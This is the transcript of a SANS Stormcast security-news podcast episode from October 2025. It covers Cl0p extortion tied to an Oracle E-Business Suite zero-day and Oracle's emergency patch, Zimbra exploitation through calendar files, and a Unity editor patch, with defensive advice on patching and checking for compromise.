SANS Stormcast Monday, October 6th, 2025: Oracle 0-Day

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9642.mp3

previous

Oracle 0-Day

00:00

iTunes

MP3 Download

RSS Feed

Google

Podbean

Amazon Echo

YouTube

Spreaker

Spotify

Discussion

Login here to join the discussion.

Podcast Transcript

 Hello and welcome to the Monday, October 6, 2025
 edition of the SANS Internet Storm Centers Stormcast. My
 name is Johannes Ullrich, recording today from Denver,
 Colorado. And this episode is brought to you by the SANS.edu
 Graduate Certificate Program in Cloud Security. Well, to
 start out with, we have some bad news for users of Oracle's
 e-business suite. Last week, I think it was Wednesday,
 Thursday, there was news coming up that many companies
 using Oracle's e-business suite did receive letters,
 emails from the Cl0p ransomware gang stating that
 their Oracle e-business suite had been compromised and,
 well, that data had been stolen. Oracle shortly after,
 via their chief security officer, did publish a blog
 post stating that they assume that the vulnerability being
 exploited here is a vulnerability patched as part
 of Oracle's critical patch update in June. So as long as
 you had that applied, well, you should be good and safe
 from any exploitation, pretty much should disregard this
 ransom note. Well, on Saturday, Oracle changed its
 stance on this. Oracle did publish an additional patch
 for its e-business suite, dispatch fixes a vulnerability
 with a CVSS score of 9.8. According to Oracle, the
 vulnerability does allow the execution of arbitrary code
 across the network without any authentication. So certainly
 one of the sort of kind of worst case scenarios. And that
 apparently is what's behind these letters, emails from the
 Cl0p ransomware gang. So if you received one of those
 emails stating that your data may have been compromised,
 first of all, take it serious, assume it's real, and, well,
 switch to instant response mode. This should be your
 highest priority on Monday. If you didn't receive one of
 those letters, well, hope that it didn't just end up in your
 spam folder, definitely still check and make sure that you
 haven't been compromised and apply the patch that Oracle
 has released this weekend. In order to apply the patch, you
 must have at least applied the June 2023 update for Oracle e
 -business suite. So make sure that this is applied first,
 but hopefully you have applied patches within the last two
 years, and then you're ready to apply this new update to
 your Oracle e-business suite. Overall, this is not a pretty
 situation, of course. Applying these patches isn't easy. This
 is definitely a patch that you do want to rush out. So
 there's definitely nothing else that you really should do
 on Monday if you do run Oracle's e-business suite
 other than working out how to, first of all, apply the patch
 and what other mitigation controls you may want to apply
 to the system, and also, well, a double, triple, quadruple
 check that you are not already compromised. Oracle, as part
 of the advisory, did release some indicators of compromise.
 There are two IP addresses that apparently affected
 systems that connect to. There are a couple hashes of malware
 being used, and then, well, a fairly generic backdoor,
 basically just sort of piping to a dev TCP. This is
 something good to look for anyway. It's not very
 specific, I think, to the Cl0p ransomware gang, but if
 you have something like this running, you are compromised.
 Maybe back Cl0p, maybe by someone else. Of course,
 there's always a chance that others have known about this
 vulnerability before, or at the same time, the Cl0p
 ransomware gang learned about it, so there is a possibility
 that other attacks have been launched against these systems
 as well. And security company StrikeReady did publish a blog
 post with details regarding early exploitation attempts
 against Simbra abusing a vulnerability that was patched
 in January. These attempts happened before a patch became
 available and now reveals some of the details of how
 attackers are abusing this vulnerability. It's relatively
 straightforward in hindsight. The attack uses calendar
 files, so .ics files, that are being sent from, well, what
 looks like valid government email addresses. Simbra, the
 open source webmail suite, is particularly popular by non-US
 governments that don't necessarily trust into US
 cloud providers and as a result are not using sort of
 your standard cloud-based webmail systems, but rather
 set up their own. And we have seen this pattern sort of play
 out repeatedly in the past, where vulnerabilities in these
 open source webmail systems are being exploited against
 governments.
 And Unity released a critical patch for its game editor. The
 interesting part here is that it's not just the editor being
 vulnerable here, but also games developed with the
 editor are vulnerable and may require a re-release. The
 vulnerability in particular for the games is more of a
 privileged escalation vulnerability, but definitely
 if you're using this editor take a quick look and make
 sure that you're up to date. The patch was released late
 last week. The advisory is labeled September 2025, so
 don't discard it as being old. The patch actually was
 released in October. The vulnerability was originally
 reported to Unity in June. And this is it for today. So
 thanks for listening, thanks for subscribing, liking and
 recommending this podcast, and talk to you again tomorrow.
 Bye.